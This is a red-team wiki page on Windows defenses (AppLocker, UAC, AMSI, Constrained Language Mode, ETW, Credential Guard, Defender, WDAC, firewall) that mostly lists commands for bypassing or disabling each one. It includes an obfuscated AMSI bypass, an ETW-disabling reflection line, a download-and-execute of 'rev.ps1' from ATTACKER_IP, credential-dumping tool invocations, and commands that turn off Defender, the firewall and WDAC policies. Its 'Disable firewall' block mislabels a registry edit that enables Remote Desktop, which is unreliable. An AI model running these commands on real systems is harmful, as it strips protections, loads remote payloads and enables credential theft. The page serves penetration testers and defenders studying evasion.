windows-defenses.md (33490B)
1 --- 2 title: "Windows - Defenses" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/evasion/windows-defenses.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/evasion/windows-defenses.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Windows - Defenses 12 13 ## Summary 14 15 * [AppLocker](#applocker) 16 * [User Account Control](#user-account-control) 17 * [DPAPI](#dpapi) 18 * [Powershell](#powershell) 19 * [Execution Policy](#execution-policy) 20 * [Anti Malware Scan Interface](#anti-malware-scan-interface) 21 * [Just Enough Administration](#just-enough-administration) 22 * [Contrained Language Mode](#constrained-language-mode) 23 * [Script Block and Module Logging](#script-block-and-module-logging) 24 * [PowerShell Transcript](#powershell-transcript) 25 * [SecureString](#securestring) 26 * [Protected Process Light](#protected-process-light) 27 * [Credential Guard](#credential-guard) 28 * [Event Tracing for Windows](#event-tracing-for-windows) 29 * [Attack Surface Reduction](#attack-surface-reduction) 30 * [Windows Defender Antivirus](#windows-defender-antivirus) 31 * [Windows Defender Application Control](#windows-defender-application-control) 32 * [Windows Defender Firewall](#windows-defender-firewall) 33 * [Windows Information Protection](#windows-information-protection) 34 35 ## AppLocker 36 37 > AppLocker is a security feature in Microsoft Windows that provides administrators with the ability to control which applications and files users are allowed to run on their systems. The rules can be based on various criteria, such as the file path, file publisher, or file hash, and can be applied to specific users or groups. 38 39 * Enumerate Local AppLocker Effective Policy 40 41 ```powershell 42 PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections 43 PowerView PS C:\> Get-AppLockerPolicy -effective -xml 44 Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe # (Keys: Appx, Dll, Exe, Msi and Script 45 ``` 46 47 * AppLocker Bypass 48 * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users 49 * [api0cradle/UltimateAppLockerByPassList/Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) 50 * [api0cradle/UltimateAppLockerByPassList/VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md) 51 * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) 52 * [api0cradle/AccessChk.bat](https://gist.github.com/api0cradle/95cd51fa1aa735d9331186f934df4df9) 53 54 ## User Account Control 55 56 UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer. 57 58 * Check if UAC is enabled 59 60 ```ps1 61 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 62 ``` 63 64 * Check UAC level 65 66 ```ps1 67 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin 68 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken 69 ``` 70 71 | EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description | 72 | --------- | ----------------------------- | ------------------------ | ------------------ | 73 | 0 | / | / | No UAC | 74 | 1 | 1 | / | No UAC | 75 | 1 | 0 | 0 | No UAC for RID 500 | 76 | 1 | 0 | 1 | UAC for Everyone | 77 78 * UAC Bypass 79 * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc 80 * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control 81 * Find process that auto elevate: 82 83 ```ps1 84 strings.exe -s *.exe | findstr /I "<autoElevate>true</autoElevate>" 85 ``` 86 87 ## DPAPI 88 89 Refer to [InternalAllTheThings/Windows - DPAPI.md](/internal/redteam/evasion/windows-dpapi) 90 91 ## Powershell 92 93 ### Execution Policy 94 95 > PowerShell Execution Policy is a security feature that controls how scripts run on a system. It helps prevent unauthorized scripts from executing, but it is not a security boundary—it only prevents accidental execution of unsigned scripts. 96 97 * Check current policy 98 99 ```ps1 100 Get-ExecutionPolicy 101 ``` 102 103 | Policy | Description | 104 | ------------ | ------------------------------------------------- | 105 | Restricted | No scripts allowed (default in some systems). | 106 | AllSigned | Only runs signed scripts. | 107 | RemoteSigned | Local scripts run, remote scripts must be signed. | 108 | Unrestricted | Runs all scripts, warns for remote scripts. | 109 | Bypass | No restrictions; all scripts run. | 110 111 * `Restricted`: it prevents the execution of all scripts (the default for workstations). 112 * `RemoteSigned`: it blocks the execution of unsigned scripts downloaded from the Internet, but allows the execution of "local" scripts (the default on servers). The command `Unblock-File` can be used to remove the Mark-of-the-Web (MotW) and make a downloaded script look like a "local" script. 113 114 ```ps1 115 # Bypass 116 Unblock-File my-file-from-internet 117 ``` 118 119 * `AllSigned`: it blocks unsigned scripts. This is the most secure option. 120 121 ```ps1 122 # Bypass 123 Get-Content .\run.ps1 | Invoke-Expression 124 ``` 125 126 You can just run `powershell.exe` with the option `-ep Bypass`, or use the built-in command `Set-ExecutionPolicy`. 127 128 ```ps1 129 powershell -ep bypass 130 Set-ExecutionPolicy Bypass -Scope Process -Force 131 ``` 132 133 ### Anti Malware Scan Interface 134 135 > The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. 136 137 Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) 138 139 ```powershell 140 PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) 141 ``` 142 143 ### Just Enough Administration 144 145 > Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information. 146 147 Breaking out if JEA: 148 149 * List available cmdlets: `command` 150 * Look for non-default cmdlets: 151 152 ```ps1 153 Set-PSSessionConfiguration 154 Start-Process 155 New-Service 156 Add-Computer 157 ``` 158 159 ### Constrained Language Mode 160 161 Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` 162 163 * Bypass using an old Powershell. Powershell v2 doesn't support CLM. 164 165 ```ps1 166 powershell.exe -version 2 167 powershell.exe -version 2 -ExecutionPolicy bypass 168 powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')" 169 ``` 170 171 * Bypass when `__PSLockDownPolicy` is used. Just put "System32" somewhere in the path. 172 173 ```ps1 174 # Enable CLM from the environment 175 [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine') 176 Get-ChildItem -Path Env: 177 178 # Create a check-mode.ps1 containing your "evil" powershell commands 179 $mode = $ExecutionContext.SessionState.LanguageMode 180 write-host $mode 181 182 # Simple bypass, execute inside a System32 folder 183 PS C:\> C:\Users\Public\check-mode.ps1 184 ConstrainedLanguage 185 186 PS C:\> C:\Users\Public\System32\check-mode.ps1 187 FullLanguagge 188 ``` 189 190 * Bypass using COM: [xpn/COM_to_registry.ps1](https://gist.githubusercontent.com/xpn/1e9e879fab3e9ebfd236f5e4fdcfb7f1/raw/ceb39a9d5b0402f98e8d3d9723b0bd19a84ac23e/COM_to_registry.ps1) 191 * Bypass using your own Powershell DLL: [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) & [iomoath/PowerShx](https://github.com/iomoath/PowerShx) 192 193 ```ps1 194 rundll32 PowerShdll,main <script> 195 rundll32 PowerShdll,main -h Display this message 196 rundll32 PowerShdll,main -f <path> Run the script passed as argument 197 rundll32 PowerShdll,main -w Start an interactive console in a new window (Default) 198 rundll32 PowerShdll,main -i Start an interactive console in this console 199 200 rundll32 PowerShx.dll,main -e <PS script to run> 201 rundll32 PowerShx.dll,main -f <path> Run the script passed as argument 202 rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet 203 rundll32 PowerShx.dll,main -w Start an interactive console in a new window 204 rundll32 PowerShx.dll,main -i Start an interactive console 205 rundll32 PowerShx.dll,main -s Attempt to bypass AMSI 206 rundll32 PowerShx.dll,main -v Print Execution Output to the console 207 ``` 208 209 ### Script Block and Module Logging 210 211 > Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel. 212 213 Enable Script Block Logging: 214 215 ```ps1 216 function Enable-PSScriptBlockLogging 217 { 218 $basePath = 'HKLM:\Software\Policies\Microsoft\Windows' + 219 '\PowerShell\ScriptBlockLogging' 220 221 if(-not (Test-Path $basePath)) 222 { 223 $null = New-Item $basePath -Force 224 } 225 226 Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1" 227 } 228 ``` 229 230 Disable ETW of the current PowerShell session with [tandasat/KillETW.ps1](https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32): 231 232 ```ps1 233 # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled which effectively disables Suspicious ScriptBlock Logging etc. 234 [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) 235 ``` 236 237 ### PowerShell Transcript 238 239 PowerShell Transcript is a logging feature that records all commands and output from a PowerShell session. It helps with auditing, debugging, and troubleshooting by saving session activity to a text file. 240 241 Start a transcript and store the output in a custom file. 242 243 ```ps1 244 Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber 245 ``` 246 247 Common locations for PowerShell transcripts outputs: 248 249 ```ps1 250 C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt 251 C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt 252 ``` 253 254 ### SecureString 255 256 A `SecureString` in PowerShell is a data type designed to store sensitive information like passwords or confidential data in a more secure manner than a plain string. Unlike a regular string, which stores data in plain text and can be easily accessed in memory, a `SecureString` encrypts the data in memory, providing better protection against unauthorized access. 257 258 Convert to SecureString 259 260 ```ps1 261 $original = 'myPassword' 262 $secureString = ConvertTo-SecureString $original -AsPlainText -Force 263 $secureStringValue = ConvertFrom-SecureString $secureString 264 ``` 265 266 Get the original content 267 268 ```ps1 269 $secureStringBack = $secureStringValue | ConvertTo-SecureString 270 $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureStringBack); 271 $finalValue = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr) 272 ``` 273 274 When a `SecureString` is created, the plain text characters are encrypted immediately using the Data Protection API (**DPAPI**) 275 276 Using the AES key 277 278 ```ps1 279 [Byte[]] $key = (49,222,...,87,159) 280 $pass = (echo "AA...AA=" | ConvertTo-SecureString -Key $key) 281 [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass)) 282 ``` 283 284 ## Protected Process Light 285 286 Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes. 287 288 When a process is marked as "protected" using PPL, it is assigned a security level that determines the level of protection it will receive. This security level can be set to one of several levels, ranging from low to high. Processes that are assigned a higher security level are given more protection than those that are assigned a lower security level. 289 290 A process's protection is defined by a combination of the "level" and the "signer". The following table represent commonly used combinations, from [itm4n.github.io](https://itm4n.github.io/lsass-runasppl/). 291 292 | Protection level | Value | Signer | Type | 293 | ------------------------------- | ----- | ---------------- | ------------------- | 294 | PS_PROTECTED_SYSTEM | 0x72 | WinSystem (7) | Protected (2) | 295 | PS_PROTECTED_WINTCB | 0x62 | WinTcb (6) | Protected (2) | 296 | PS_PROTECTED_WINDOWS | 0x52 | Windows (5) | Protected (2) | 297 | PS_PROTECTED_AUTHENTICODE | 0x12 | Authenticode (1) | Protected (2) | 298 | PS_PROTECTED_WINTCB_LIGHT | 0x61 | WinTcb (6) | Protected Light (1) | 299 | PS_PROTECTED_WINDOWS_LIGHT | 0x51 | Windows (5) | Protected Light (1) | 300 | PS_PROTECTED_LSA_LIGHT | 0x41 | Lsa (4) | Protected Light (1) | 301 | PS_PROTECTED_ANTIMALWARE_LIGHT | 0x31 | Antimalware (3) | Protected Light (1) | 302 | PS_PROTECTED_AUTHENTICODE_LIGHT | 0x11 | Authenticode (1) | Protected Light (1) | 303 304 PPL works by restricting access to the protected process's memory and system resources, and by preventing the process from being modified or terminated by other processes or users. The process is also isolated from other processes running on the system, which helps prevent attacks that attempt to exploit shared resources or dependencies. 305 306 * Check if LSASS is running in PPL 307 308 ```ps1 309 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL 310 ``` 311 312 * Protected process example: you can't kill Microsoft Defender even with Administrator privilege. 313 314 ```ps1 315 taskkill /f /im MsMpEng.exe 316 ERROR: The process "MsMpEng.exe" with PID 5784 could not be terminated. 317 Reason: Access is denied. 318 ``` 319 320 * Can be disabled using vulnerable drivers (Bring Your Own Vulnerable Driver / BYOVD) 321 322 ## Credential Guard 323 324 When Credential Guard is enabled, it uses hardware-based virtualization to create a secure environment that is separate from the operating system. This secure environment is used to store sensitive credential information, which is encrypted and protected from unauthorized access. 325 326 Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features. 327 328 * [bytewreck/DumpGuard](https://github.com/bytewreck/DumpGuard) - Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems. 329 * [EvanMcBroom/lsa-whisperer](https://github.com/EvanMcBroom/lsa-whisperer) - Tools for interacting with authentication packages using their individual message protocols. 330 331 | Technique | Requires<br>SYSTEM | Requires<br>SPN Account | Can Dump<br>Credential Guard | 332 | --------------------------------------------------------------- | :----------------: | :---------------------: | :--------------------------: | 333 | Extract own credentials via Remote Credential Guard protocol | :x: | ✅ | ✅ | 334 | Extract all credentials via Remote Credential Guard protocol | ✅ | ✅ | ✅ | 335 | Extract all credentials via Microsoft v1 authentication package | ✅ | :x: | :x: | 336 337 * **Dumping own session using Remote Credential Guard**: this works regardless of the state of Credential Guard, but requires credentials for an SPN-enabled account. 338 339 ```ps1 340 DumpGuard.exe /mode:self /domain:<DOMAIN> /username:<SAMACCOUNTNAME> /password:<PASSWORD> [/spn:<SPN>] 341 ``` 342 343 * **Dumping all sessions using Remote Credential Guard**: this works regardless of the state of Credential Guard, but requires credentials for an SPN-enabled account and `SYSTEM` privileges. 344 345 ```ps1 346 DumpGuard.exe /mode:all /domain:<DOMAIN> /username:<SAMACCOUNTNAME> /password:<PASSWORD> [/spn:<SPN>] 347 ``` 348 349 * **Dumping all sessions using Microsoft v1 authentication package** 350 * Credential Guard is disabled on the local system. 351 * Remote users are authenticated to the local system from a remote host over Remote Credential Guard. 352 353 ```ps1 354 DumpGuard.exe /mode:all 355 # or 356 lsa-whisperer.exe msv1_0 Lm20GetChallengeResponse --luid {session id} --challenge {challenge to clients} [flags...] 357 ``` 358 359 ## Event Tracing for Windows 360 361 ETW (Event Tracing for Windows) is a Windows-based logging mechanism that provides a way to collect and analyze system events and performance data in real-time. ETW allows developers and system administrators to gather detailed information about system performance and behavior, which can be used for troubleshooting, optimization, and security purposes. 362 363 | Name | GUID | 364 |---------------------------------------|----------------------------------------| 365 | Microsoft-Antimalware-Scan-Interface | {2A576B87-09A7-520E-C21A-4942F0271D67} | 366 | Microsoft-Windows-PowerShell | {A0C1853B-5C40-4B15-8766-3CF1C58F985A} | 367 | Microsoft-Antimalware-Protection | {E4B70372-261F-4C54-8FA6-A5A7914D73DA} | 368 | Microsoft-Windows-Threat-Intelligence | {F4E1897C-BB5D-5668-F1D8-040F4D8DD344} | 369 370 You can see all the providers registered to Windows using: `logman query providers` 371 372 ```ps1 373 PS C:\Users\User\Documents> logman query providers 374 375 Provider GUID 376 ------------------------------------------------------------------------------- 377 .NET Common Language Runtime {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} 378 ACPI Driver Trace Provider {DAB01D4D-2D48-477D-B1C3-DAAD0CE6F06B} 379 Active Directory Domain Services: SAM {8E598056-8993-11D2-819E-0000F875A064} 380 Active Directory: Kerberos Client {BBA3ADD2-C229-4CDB-AE2B-57EB6966B0C4} 381 Active Directory: NetLogon {F33959B4-DBEC-11D2-895B-00C04F79AB69} 382 ADODB.1 {04C8A86F-3369-12F8-4769-24E484A9E725} 383 ADOMD.1 {7EA56435-3F2F-3F63-A829-F0B35B5CAD41} 384 ... 385 ``` 386 387 We can get more information about the provider using: `logman query providers {ProviderID}/Provider-Name` 388 389 ```ps1 390 PS C:\Users\User\Documents> logman query providers Microsoft-Antimalware-Scan-Interface 391 392 Provider GUID 393 ------------------------------------------------------------------------------- 394 Microsoft-Antimalware-Scan-Interface {2A576B87-09A7-520E-C21A-4942F0271D67} 395 396 Value Keyword Description 397 ------------------------------------------------------------------------------- 398 0x0000000000000001 Event1 399 0x8000000000000000 AMSI/Debug 400 401 Value Level Description 402 ------------------------------------------------------------------------------- 403 0x04 win:Informational Information 404 405 PID Image 406 ------------------------------------------------------------------------------- 407 0x00002084 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 408 0x00002084 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 409 0x00001bd4 410 0x00000ad0 411 0x00000b98 412 ``` 413 414 The `Microsoft-Windows-Threat-Intelligence` provider corresponds to ETWTI, an additional security feature that an EDR can subscribe to and identify malicious uses of APIs (e.g. process injection). 415 416 ```ps1 417 0x0000000000000001 KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL 418 0x0000000000000002 KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER 419 0x0000000000000004 KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE 420 0x0000000000000008 KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE_KERNEL_CALLER 421 0x0000000000000010 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL 422 0x0000000000000020 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER 423 0x0000000000000040 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE 424 0x0000000000000080 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER 425 0x0000000000000100 KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL 426 0x0000000000000200 KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL_KERNEL_CALLER 427 0x0000000000000400 KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE 428 0x0000000000000800 KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE_KERNEL_CALLER 429 0x0000000000001000 KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE 430 0x0000000000002000 KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE_KERNEL_CALLER 431 0x0000000000004000 KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE 432 0x0000000000008000 KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER 433 0x0000000000010000 KERNEL_THREATINT_KEYWORD_READVM_LOCAL 434 0x0000000000020000 KERNEL_THREATINT_KEYWORD_READVM_REMOTE 435 0x0000000000040000 KERNEL_THREATINT_KEYWORD_WRITEVM_LOCAL 436 0x0000000000080000 KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE 437 0x0000000000100000 KERNEL_THREATINT_KEYWORD_SUSPEND_THREAD 438 0x0000000000200000 KERNEL_THREATINT_KEYWORD_RESUME_THREAD 439 0x0000000000400000 KERNEL_THREATINT_KEYWORD_SUSPEND_PROCESS 440 0x0000000000800000 KERNEL_THREATINT_KEYWORD_RESUME_PROCESS 441 ``` 442 443 The most common bypassing technique is patching the function `EtwEventWrite` which is called to write/log ETW events. You can list the providers registered for a process with `logman query providers -pid <PID>` 444 445 ## Attack Surface Reduction 446 447 > Attack Surface Reduction (ASR) refers to strategies and techniques used to decrease the potential points of entry that attackers could use to exploit a system or network. 448 449 ```ps1 450 Add-MpPreference -AttackSurfaceReductionRules_Ids <Id> -AttackSurfaceReductionRules_Actions AuditMode 451 Add-MpPreference -AttackSurfaceReductionRules_Ids <Id> -AttackSurfaceReductionRules_Actions Enabled 452 ``` 453 454 | Description | Id | 455 | ----------------------------------------------------------------------------------------- | ------------------------------------ | 456 | Block execution of potentially obfuscated scripts | 5beb7efe-fd9a-4556-801d-275e5ffc04cc | 457 | Block JavaScript or VBScript from launching downloaded executable content | d3e037e1-3eb8-44c8-a917-57927947596d | 458 | Block abuse of exploited vulnerable signed drivers | 56a863a9-875e-4185-98a7-b882c64b5ce5 | 459 | Block executable content from email client and webmail | be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 | 460 | Block process creations originating from PSExec and WMI commands | d1e49aac-8f56-4280-b9ba-993a6d77406c | 461 | Use advanced protection against ransomware | c1db55ab-c21a-4637-bb3f-a12568109d35 | 462 | Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 | 463 464 ## Windows Defender Antivirus 465 466 Also known as `Microsoft Defender`. 467 468 * Check status of Defender 469 470 ```powershell 471 PS C:\> Get-MpComputerStatus 472 ``` 473 474 * Disable scanning all downloaded files and attachments 475 476 ```powershell 477 PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus 478 PS C:\> Set-MpPreference -DisableIOAVProtection $true 479 ``` 480 481 * Disable AMSI (set to 0 to enable) 482 483 ```powershell 484 PS C:\> Set-MpPreference -DisableScriptScanning 1 485 ``` 486 487 * Exclude a folder, a process from scanning 488 489 ```powershell 490 PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" 491 PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" 492 PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" 493 ``` 494 495 * Exclude a folder using WMI 496 497 ```powershell 498 PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic" 499 ``` 500 501 * Remove signatures. **NOTE**: if Internet connection is present, they will be downloaded again. 502 503 ```powershell 504 PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All 505 PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All 506 ``` 507 508 Identify the exact bytes that are detected by Windows Defender Antivirus 509 510 * [matterpreter/DefenderCheck](https://github.com/matterpreter/DefenderCheck) - Identifies the bytes that Microsoft Defender flags on 511 * [gatariee/gocheck](https://github.com/gatariee/gocheck) - DefenderCheck but blazingly fast™ 512 513 ## Windows Defender Application Control 514 515 Also known as `WDAC/UMCI/Device Guard`. 516 517 > Windows Defender Application Guard, formerly known as Device Guard has the power to control if an application may or may not be executed on a Windows device. WDAC will prevent the execution, running, and loading of unwanted or malicious code, drivers, and scripts. WDAC does not trust any software it does not know of. 518 519 * Get WDAC current mode 520 521 ```ps1 522 $ Get-ComputerInfo 523 DeviceGuardCodeIntegrityPolicyEnforcementStatus : EnforcementMode 524 DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus : EnforcementMode 525 ``` 526 527 * Remove WDAC policies using CiTool.exe (Windows 11 2022 Update) 528 529 ```ps1 530 CiTool.exe -rp "{PolicyId GUID}" -json 531 ``` 532 533 * Device Guard policy location: `C:\Windows\System32\CodeIntegrity\CiPolicies\Active\{PolicyId GUID}.cip` 534 * Device Guard example policies: `C:\Windows\System32\CodeIntegrity\ExamplePolicies\` 535 * WDAC utilities: [mattifestation/WDACTools](https://github.com/mattifestation/WDACTools), a PowerShell module to facilitate building, configuring, deploying, and auditing Windows Defender Application Control (WDAC) policies 536 * WDAC bypass techniques: [bohops/UltimateWDACBypassList](https://github.com/bohops/UltimateWDACBypassList) 537 * [nettitude/Aladdin](https://github.com/nettitude/Aladdin) - WDAC Bypass using AddInProcess.exe 538 539 ## Windows Defender Firewall 540 541 * List firewall state and current configuration 542 543 ```powershell 544 netsh advfirewall firewall dump 545 # or 546 netsh firewall show state 547 netsh firewall show config 548 ``` 549 550 * List firewall's blocked ports 551 552 ```powershell 553 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 554 ``` 555 556 * Disable firewall 557 558 ```powershell 559 # Disable Firewall via cmd 560 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 561 562 # Disable Firewall via Powershell 563 powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'` 564 565 # Disable Firewall on any windows using native command 566 netsh firewall set opmode disable 567 netsh Advfirewall set allprofiles state off 568 ``` 569 570 ## Windows Information Protection 571 572 Windows Information Protection (WIP), formerly known as Enterprise Data Protection (EDP), is a security feature in Windows 10 that helps protect sensitive data on enterprise devices. WIP helps to prevent accidental data leakage by allowing administrators to define policies that control how enterprise data can be accessed, shared, and protected. WIP works by identifying and separating enterprise data from personal data on the device. 573 574 Protection of file (data) locally marked as corporate is facilitated via Encrypting File System (EFS) encryption of Windows (a feature of NTFS file system) 575 576 * Enumerate files attributes, `Encrypted` attribute is used for files protected by WIP 577 578 ```ps1 579 PS C:\> (Get-Item -Path 'C:\...').attributes 580 Archive, Encrypted 581 ``` 582 583 * Encrypt files: `cipher /c encryptedfile.extension` 584 * Decrypt files: `cipher /d encryptedfile.extension` 585 586 The **Enterprise Context** column shows you what each app can do with your enterprise data: 587 588 * **Domain**. Shows the employee's work domain (such as, corp.contoso.com). This app is considered work-related and can freely touch and open work data and resources. 589 * **Personal**. Shows the text, Personal. This app is considered non-work-related and can't touch any work data or resources. 590 * **Exempt**. Shows the text, Exempt. Windows Information Protection policies don't apply to these apps (such as, system components). 591 592 ## BitLocker Drive Encryption 593 594 BitLocker is a full-disk encryption feature included in Microsoft Windows operating systems starting with Windows Vista. It is designed to protect data by providing encryption for entire volumes. BitLocker uses AES encryption algorithm to encrypt data on the disk. When enabled, BitLocker requires a user to enter a password or insert a USB flash drive to unlock the encrypted volume before the operating system is loaded, ensuring that data on the disk is protected from unauthorized access. BitLocker is commonly used on laptops, portable storage devices, and other mobile devices to protect sensitive data in case of theft or loss. 595 596 When BitLocker is in `Suspended` state, boot the system using a Windows Setup USB, and then decrypt the drive using this command: `manage-bde -off c:` 597 598 You can check if it is done decrypting using this command: `manage-bde -status` 599 600 ## References 601 602 * [Attack surface reduction rules reference - Microsoft 365 - November 30, 2023](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide) 603 * [Catching Credential Guard Off Guard - Valdemar Carøe - October 23, 2025](https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/) 604 * [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - Microsoft - December 9, 2022](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate) 605 * [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - Microsoft - March 10, 2023](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context) 606 * [DISABLING AV WITH PROCESS SUSPENSION - Christopher Paschen - March 24, 2023](https://www.trustedsec.com/blog/disabling-av-with-process-suspension/) 607 * [Disabling Event Tracing For Windows - UNPROTECT Project - April 19, 2022](https://unprotect.it/technique/disabling-event-tracing-for-windows-etw/) 608 * [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - April 7, 2021](https://itm4n.github.io/lsass-runasppl/) 609 * [ETW: Event Tracing for Windows 101 - ired.team - January 6, 2020](https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/etw-event-tracing-for-windows-101) 610 * [PowerShell about_Logging_Windows - Microsoft Documentation - September 30, 2025](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3) 611 * [Remove Windows Defender Application Control (WDAC) policies - Microsoft - December 9, 2022](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/disable-windows-defender-application-control-policies) 612 * [Sneaking Past Device Guard - Cybereason - Philip Tsukerman - December 4, 2022](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)